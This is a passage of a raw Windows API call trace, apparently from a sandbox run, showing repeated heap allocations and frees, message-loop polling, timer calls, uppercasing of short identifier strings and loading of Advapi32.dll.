wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0196.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.662] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.662] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0196.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0196.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0196.663] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.663] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0196.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.664] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.664] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0196.664] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0196.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.664] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.665] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.665] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.665] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.667] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0196.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0196.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0196.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.668] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0196.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.669] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.669] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.669] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0196.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0196.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0196.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0196.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0196.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.680] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 1 [0196.680] TranslateMessage (lpMsg=0x8bf250) returned 0 [0196.680] DispatchMessageW (lpMsg=0x8bf250) returned 0x0 [0196.680] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0196.680] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0196.681] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0196.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0196.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0196.681] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0196.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0196.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0196.682] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0196.682] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.682] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0196.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.683] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0196.683] 